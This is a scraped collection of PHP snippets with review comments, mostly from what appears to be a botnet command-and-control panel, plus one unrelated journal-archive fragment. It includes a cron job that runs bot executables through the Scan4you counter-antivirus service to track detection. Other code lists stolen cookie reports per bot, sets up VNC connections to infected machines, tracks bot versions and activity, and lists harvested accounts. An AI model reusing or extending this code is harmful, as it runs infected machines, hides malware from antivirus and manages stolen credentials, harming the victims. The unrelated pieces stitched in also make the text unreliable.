Example #1
 /** Scan exe files under files/ using scan4you
  *
  * Every `exe_updates` row whose `scan_date` is older than 20 hours is passed to
  * Scan4you::scan(). The threat/okay counts and the rendered HTML report are written
  * back to the row, and files flagged by 6 or more engines are queued for one Jabber message.
  *
  * @param int|null $id
  * 	File id for force scan (its `scan_date` is reset to 0 so the row qualifies again)
  * @return array
  * 	File name => array('threat' => int, 'okay' => int), plus 'error' when the scan reported one
  * @cron if: return !empty($GLOBALS['config']['scan4you_id']) && !empty($GLOBALS['config']['scan4you_token']);
  * @cron period: 1d
  * @cron weight: 10
  */
 function cronjob_avirscan_files($id = null)
 {
     $summary_by_file = array();
     $alerts = array();
     $scanner = new Scan4you($GLOBALS['config']['scan4you_id'], $GLOBALS['config']['scan4you_token']);

     // A forced scan only zeroes the timestamp; the SELECT below then picks the row up.
     if ($id !== null) {
         $reset_sql = mkquery('UPDATE `exe_updates` SET `scan_date`=0 WHERE `id`={i:id};', array('id' => $id));
         mysql_q($reset_sql);
     }

     // Rows last scanned more than 20 hours ago are due again.
     $stale_before = time() - 60 * 60 * 20;
     $rows = mysql_q(mkquery('SELECT `id`, `file`, `mtime` FROM `exe_updates` WHERE `scan_date` < {i:date};', array('date' => $stale_before)));
     while ($rows && !is_bool($row = mysql_fetch_assoc($rows))) {
         $name = $row['file'];

         # scan
         $report = $scanner->scan('files/' . $name);
         $entry = array('threat' => count($report->scan_threat), 'okay' => count($report->scan_okay));
         if ($report->error !== null) {
             $entry['error'] = $report->error;
         }
         $summary_by_file[$name] = $entry;

         # store
         // NOTE(review): `scan_details` receives HTML produced by render_html(); whether that
         // markup is escaped before it is shown again is not visible here - confirm.
         $update_params = array(
             'threat' => count($report->scan_threat),
             'count' => count($report->scan_threat) + count($report->scan_okay),
             'details' => $report->render_html('class="avirscan-results-map"'),
             'id' => $row['id'],
         );
         mysql_q(mkquery("UPDATE `exe_updates` SET `scan_date`=UNIX_TIMESTAMP(), `scan_threat` = {i:threat}, `scan_count`={i:count}, `scan_details`={s:details} WHERE `id`={i:id}", $update_params));

         # notify
         if (count($report->scan_threat) >= 6) {
             $alerts[] = sprintf("%s: %d Antiviruses detect it!\n\n%s\n", $name, count($report->scan_threat), $report->render_text());
         }
     }

     # Jabber notify
     // Called on every run, also when no file crossed the threshold and $alerts is empty.
     jabber_notify($GLOBALS['config']['scan4you_jid'], $alerts);

     # Results
     return $summary_by_file;
 }
    /** Remove old scripts which are one-shot
     *
     * Deletes disabled scripts with `send_limit`=1 that were created more than 7 days ago,
     * together with their rows in `botnet_scripts_stat` (joined on `extern_id`).
     *
     * @return array
     * 	array('removed' => value of mysql_affected_rows() after the DELETE)
     * @cron period: 1d
     */
    function cronjob_cleanse_old()
    {
        // Retention window: one week, in seconds.
        $created_before = time() - 60 * 60 * 24 * 7;
        $sql = 'DELETE `botnet_scripts`, `botnet_scripts_stat`
			 FROM `botnet_scripts` CROSS JOIN `botnet_scripts_stat` USING(`extern_id`)
			 WHERE `botnet_scripts`.`flag_enabled`=0 AND `botnet_scripts`.`send_limit`=1 AND `botnet_scripts`.`time_created`<{i:time_thr}
			 ';
        mysql_q(mkquery($sql, array('time_thr' => $created_before)));

        // The count covers rows removed from both tables of the multi-table DELETE.
        $removed = mysql_affected_rows();
        return array('removed' => $removed);
    }
Example #3
                    }
                }
                // Redirect to the reports_files view, passing the collected ids in $blist
                // (built above this excerpt) as one space-separated, URL-encoded value.
                header('Location: ' . QUERY_STRING_BLANK . 'reports_files&bots=' . urlencode(implode(' ', $blist)) . '&q=');
                die;
            } else {
                // 'cookies' action: list stored reports of type BLT_COOKIES for the ids in $blist,
                // one HTML table per daily reports table, newest table first.
                if (strcmp($ba, 'cookies') === 0) {
                    require_once 'system/lib/db.php';
                    require_once 'system/lib/guiutil.php';
                    echo '<link rel="stylesheet" href="theme/style.css" />';
                    $found_n = 0;
                    foreach (array_reverse(list_reports_tables(true)) as $yymmdd) {
                        // NOTE(review): {=:yymmdd} is spliced into the table name and {s,:botId}
                        // receives the whole $blist array; how mkquery() expands and escapes
                        // these placeholder forms is not visible here - confirm.
                        $R = mysql_q(mkquery('SELECT
				`id`,
				`rtime`,
			 	`path_source`,
			 	`context`
			 FROM `botnet_reports_{=:yymmdd}`
			 WHERE `bot_id` IN({s,:botId}) AND `type`={i:type}
			 ORDER BY `rtime` DESC
			 ', array('yymmdd' => $yymmdd, 'botId' => $blist, 'type' => BLT_COOKIES)));
                        // NOTE(review): $R is not checked for false before mysql_num_rows().
                        $n = mysql_num_rows($R);
                        if (!$n) {
                            continue;
                        }
                        $found_n += $n;
                        // Caption: the yymmdd table suffix shown as 20yy.mm.dd
                        echo '<table class="lined"><caption>', '20', implode('.', str_split($yymmdd, 2)), '</caption>';
                        echo '<TBODY>';
                        while (!is_bool($r = mysql_fetch_assoc($R))) {
                            // Both database values are passed through htmlspecialchars() before output.
                            // NOTE(review): the age column subtracts `path_source` from time(); the
                            // selected `rtime` column looks like the intended operand - confirm.
                            // NOTE(review): the <pre> opened here is never closed.
                            echo '<tr>', '<th>', timeago(time() - $r['path_source']), '</th>', '<td>', htmlspecialchars($r['path_source']), '</td>', '<td><pre>', htmlspecialchars($r['context']), '</td>', '</tr>';
                        }
                        // NOTE(review): closes with </BODY> although <TBODY> was opened.
                        echo '</BODY></table>';
/**
 * Build the HTML rows of the statistics table for one botnet, or for all of them.
 *
 * Reads from `botnet_list`: the earliest `rtime_first`, the number of bots, the lowest and
 * highest `bot_version`, the number of bots whose `rtime_last` falls in the last 24 hours,
 * and a per-version count for four time windows. The result is theme markup with the
 * output of jsonset() and two <script> tags appended.
 *
 * @param string $botnet Botnet name to filter on; a value loosely equal to '' disables the filter.
 * @param int    $i      Selects which of the alternating *_U1 / *_U2 row templates is used first.
 * @return string HTML fragment.
 */
function getBotnetStats($botnet, $i)
{
    $query1 = '';
    $query2 = '';
    if ($botnet != '') {
        // NOTE(review): addslashes() is not aware of the connection character set, and the
        // result is interpolated into both WHERE fragments below. The driver's own escaping
        // function or a bound parameter is the safer way to pass this value.
        $botnet = addslashes($botnet);
        $query1 = " WHERE `botnet`='{$botnet}'";
        $query2 = " AND `botnet`='{$botnet}'";
    }
    // Number of bots and time of the first report.
    // '@' hides a failed fetch: $mt is then false, '-' is shown for the date, and the
    // $mt[1]..$mt[3] reads below operate on a non-array.
    $tmp = htmlEntitiesEx(($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', "SELECT MIN(`rtime_first`), COUNT(`bot_id`), MIN(`bot_version`), MAX(`bot_version`) FROM `botnet_list`{$query1}"))) && $mt[0] > 0 ? gmdate(LNG_FORMAT_DT, $mt[0]) : '-');
    $data = THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_FIRST_BOT), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $tmp), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, numberFormatAsInt($mt[1])), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
    // Keep the first query's columns; $mt is overwritten by the next query.
    $totalBots = $mt[1];
    $minVersion = $mt[2];
    $maxVersion = $mt[3];
    // Number of bots active during the last 24 hours.
    $tmp = ($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', 'SELECT COUNT(`bot_id`) FROM `botnet_list` WHERE `rtime_last`>=' . (CURRENT_TIME - 86400) . $query2))) ? $mt[0] : 0;
    // $totalBots is reused from here on as the rendered "percent - count" link, not the raw count.
    $totalBots = '<a href="#" id="tr-botnet_activity">' . ($totalBots > 0 ? numberFormatAsFloat($tmp * 100 / $totalBots, 2) : 0) . '% -  ' . numberFormatAsInt($tmp) . '</a>';
    $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS24), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $totalBots), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END;
    // Hidden row holding the activity tabs; each tab links to the botnet_activity ajax
    // endpoint for 7, 14 or 30 days.
    $data .= '<tr><td id="botnet_activity" style="display: none;">
			<h3>' . LNG_STATS_ACTIVITY . '</h3>
			<ul class="tabs">
				<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=7">' . LNG_STATS_ACTIVITY_7DAYS . '</a></li>
				<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=14">' . LNG_STATS_ACTIVITY_14DAYS . '</a></li>
				<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=30">' . LNG_STATS_ACTIVITY_30DAYS . '</a></li>
				</ul>
			<div class="display">
				</div>
			</td></tr>
			';
    // Maximum and minimum bot version.
    $botVersions = intToVersion($minVersion) . ' — ' . intToVersion($maxVersion);
    $botVersions = '<a href="#" id="botVersions">' . $botVersions . '</a>';
    $data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_VERSIONS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $botVersions), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
    require_once "system/lib/db.php";
    require_once "system/lib/guiutil.php";
    $data .= jsonset(array('window.botVersions' => array()));
    // Per-version counts for four windows: 0 = all time, 1 = last day, 2 = last 7 days,
    // 3 = last 31 days. The ids match the data-id attributes of the list built below.
    // NOTE(review): unlike the queries above, this one does not apply the $botnet filter.
    foreach (array(0 => 0, 1 => time() - 60 * 60 * 24, 2 => time() - 60 * 60 * 24 * 7, 3 => time() - 60 * 60 * 24 * 31) as $id => $rtime_last) {
        $R = mysql_q(mkquery('SELECT
					`bot_version` AS `v`,
					COUNT(*) AS `n`
				 FROM `botnet_list`
				 WHERE `rtime_last` >= {i:rtime_last}
				 GROUP BY `v`
				 ORDER BY `n` DESC, `v` DESC
				 ', array('rtime_last' => $rtime_last)));
        $versions = array();
        // A failed query leaves $versions empty for this window.
        while ($R && !is_bool($r = mysql_fetch_assoc($R))) {
            $versions[] = array(intToVersion($r['v']), (int) $r['n']);
        }
        $data .= jsonset(array('window.botVersions[' . $id . ']' => $versions));
    }
    // Period selector; the <li> elements are left unclosed.
    $ul = '';
    $ul .= '<li><a href="#" data-id="0">' . LNG_STATS_TOTAL_VERSIONS_ALL . '</a>';
    $ul .= '<li><a href="#" data-id="1">' . LNG_STATS_TOTAL_VERSIONS_DAY . '</a>';
    $ul .= '<li><a href="#" data-id="2">' . LNG_STATS_TOTAL_VERSIONS_WEEK . '</a>';
    $ul .= '<li><a href="#" data-id="3">' . LNG_STATS_TOTAL_VERSIONS_MONTH . '</a>';
    // Hidden row for the version chart. The markup pulls a script from www.google.com in
    // addition to the page's own theme/js/page-stats_main.js.
    $data .= <<<HTML
<tr><td id="botVersions-td" style="display:none;">
\t\t<div id="botVersions-Display" class="clearfix">
\t\t\t<div class="pie"></div>
\t\t\t<div class="table"></div>
\t\t\t</div>
\t\t<ul class="period">
\t\t\t{$ul}
\t\t\t</ul>
\t</td></tr>

<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script src="theme/js/page-stats_main.js"></script>
HTML;
    return $data;
}
Example #5
 /** Remove old, archived Jabber notifications
  *
  * Deletes `jabber_messages` rows that are marked as sent and whose `sent_time`
  * is more than 10 days in the past.
  *
  * @return array
  * 	array('cleansed' => value of mysql_affected_rows() after the DELETE)
  * @cron period: 1d
  */
 function cronjob_jabber_cleanse()
 {
     // Retention window: ten days, in seconds.
     $sent_before = time() - 60 * 60 * 24 * 10;
     $sql = mkquery('DELETE FROM `jabber_messages` WHERE `sent`=1 AND `sent_time` < {i:old};', array('old' => $sent_before));
     mysql_q($sql);

     $cleansed = mysql_affected_rows();
     return array('cleansed' => $cleansed);
 }
Example #6
/**
 * Find botId by IP.
 *
 * The address is converted with ip2long() and packed as a 4-byte big-endian string,
 * which is the form compared against the `ipv4` column of `botnet_list`.
 *
 * @param string $ip Dotted-quad IPv4 address.
 * @return mixed The first column of the first matching row, or null when the query
 *               fails or matches nothing.
 */
function bot_ip2id($ip)
{
    // NOTE(review): ip2long() returns false for a malformed address and pack('N', ...) still
    // produces four bytes from it; the input is not validated before the lookup.
    $packed = pack('N', ip2long($ip));
    $sql = mkquery('SELECT `bot_id` FROM `botnet_list` WHERE `ipv4`={s:ip_bin};', array('ip_bin' => $packed));
    $result = mysql_query($sql);
    if ($result && mysql_num_rows($result) != 0) {
        // NOTE(review): array_shift() takes its argument by reference; it is handed a
        // function result here rather than a variable.
        return array_shift(mysql_fetch_row($result));
    }
    return null;
}
            break;
        case 'add_connect':
            # ?m=botnet_vnc&ajax=add_connect&bot=ID&protocol=VNC&autoconnect=0
            // NOTE(review): the three $_GET keys are read without isset() checks, and
            // array_search() is called without its strict flag; it returns false when the
            // protocol name is absent from $PROTOCOLS, and that false is bound to {i:protocol}.
            $d = array('bot' => $_GET['bot'], 'protocol' => array_search($_GET['protocol'], $PROTOCOLS), 'do_connect' => $_GET['autoconnect'] ? -1 : 1);
            if (mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:bot}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $d))) {
                echo 'OK';
            } else {
                // NOTE(review): the raw database error text is written to the HTTP response.
                echo 'MySQL error: ' . mysql_error();
            }
            break;
    }
    die;
}
// Form submission: store the requested connection, then redirect back to the module page.
if (count($_POST)) {
    if (isset($_POST['connect'])) {
        // NOTE(review): the request-supplied $_POST['connect'] array is used as-is as the
        // mkquery() parameter map (keys botid, protocol, do_connect are expected). No check
        // that it is an array with those keys is visible, and the query result is ignored.
        mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:botid}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $_POST['connect']));
        // NOTE(review): 301 is a permanent, cacheable redirect; 303 is the usual status
        // for redirecting after a POST.
        header('HTTP/1.1 301 Redirect');
        header('Location: ?m=botnet_vnc');
        die;
    }
}
ThemeBegin(LNG_THEME_TITLE, 0, getBotJsMenu('botmenu'), 0);
echo '<table class="table_frame" id="switch-tabs"><tr><td>', '<ul>', '<li class="current"><a href="?m=botnet_vnc"><img src="images/vnc.png" />', LNG_MM_BOTNET_VNC, '</a></li>', '<li class="other"  ><a href="?m=reports_accparse"><img src="images/drill.png" />', LNG_MM_REPORTS_ACCPARSE, '</a></li>', '</ul>', '</td></tr></table>';
# ==========[ ADD BOT ]========== #
echo str_replace(array('{WIDTH}', '{COLUMNS_COUNT}', '{TEXT}'), array('100%', 1, LNG_CREATE_CONNECTION), THEME_LIST_BEGIN . THEME_LIST_TITLE), '<tr><td>';
// The form is only rendered when a vnc_server value is configured.
if (empty($GLOBALS['config']['vnc_server'])) {
    echo '<div class="error">', LNG_NOT_CONFIGURED, '</div>';
} else {
    // Field names use the connect[...] array syntax read by the POST handler above.
    echo '<form method=POST>';
    echo '<dl>';
    echo '<dt>', LNG_CREATE_CONNECTION_BOTID, '</dt>', '<dd>', '<input type="text" name="connect[botid]" value="" size="100"/>', '</dd>';
Example #8
><span>References</span></label></div>
				<div><select name="sec" id="ignore">
					<option selected>All sections</option>
					<?php 
    // One <option> per entry of $subj; the entry whose key equals $sec is pre-selected.
    // NOTE(review): $k and $v are written into the markup without htmlspecialchars(). Where
    // $subj is filled is not visible here - confirm that it never holds request-derived text.
    // NOTE(review): the comparison is strict, so a string $sec never matches an integer key.
    foreach ($subj as $k => $v) {
        $sel = $sec && $sec === $k ? ' selected' : '';
        echo '<option value="' . $k . '"' . $sel . '>' . $v . '</option>';
    }
    ?>
				</select></div>
				<div><button class="btn btn-green">Search</button></div>
			</form>
		</div>
<?php 
}
// NOTE(review): mysqli::query() returns false on failure; that case is not checked before
// fetch_assoc() is called on the result.
$res = $mysqli->query(mkquery($query));
// Group the rows by volume and then by issue, counting them as they are read.
// Initial values for $arc and $totrow are not visible in this excerpt.
while ($row = $res->fetch_assoc()) {
    $arc[$row['vol']][$row['issue']][] = $row;
    $totrow++;
}
/*echo '<pre>';
print_r($arc);
echo '</pre>';*/
if (isset($arc)) {
    $cursec = '';
    if ($xtra) {
        echo plural($totrow, 'result');
    }
    foreach ($arc as $vol => $issue) {
        $year = J_YEAR + $vol;
        $cur = current($issue);
     }
     echo '</TBODY>';
     echo '</table>';
     break;
     # List accounts of a rule|bot
 # List accounts of a rule|bot
 case 'accs':
     # The Input
     # The WHERE clause is assembled from fixed fragments only. The request values enter
     # through the {i:rule} and {s:bot} placeholders, with the whole $_GET array as the
     # parameter map.
     # NOTE(review): how mkquery() casts or escapes each placeholder type is not visible
     # here - confirm before relying on it.
     $where = '1=1';
     if (!empty($_GET['rule'])) {
         $where .= ' AND `a`.`rule_id`={i:rule}';
     }
     if (!empty($_GET['bot'])) {
         $where .= ' AND `a`.`bot_id`={s:bot}';
     }
     $where = mkquery($where, $_GET);
     # 'online' is normalised to an integer, 0 when absent.
     $_GET['online'] = isset($_GET['online']) ? (int) $_GET['online'] : 0;
     # The Query
     $R = mysql_query($q = <<<SQL
t\tSELECT
t\t\t`r`.`id` AS `rule_id`,
t\t\t`r`.`alias` AS `rule_alias`,
t\t\t`r`.`enabled` AS `rule_enabled`,
t\t\t`a`.`bot_id` AS `bot_id`,
t\t\t`a`.`bot_info` AS `bot_info`,
t\t\t`a`.`id` AS `acc_id`,
t\t\t`a`.`account` AS `account`,
t\t\t`a`.`mtime` AS `acc_mtime`,
t\t\t`a`.`favorite` AS `acc_favorite`,
t\t\t`a`.`notes` AS `acc_notes`,
t\t\t`b`.`os_version` AS `bot_os`,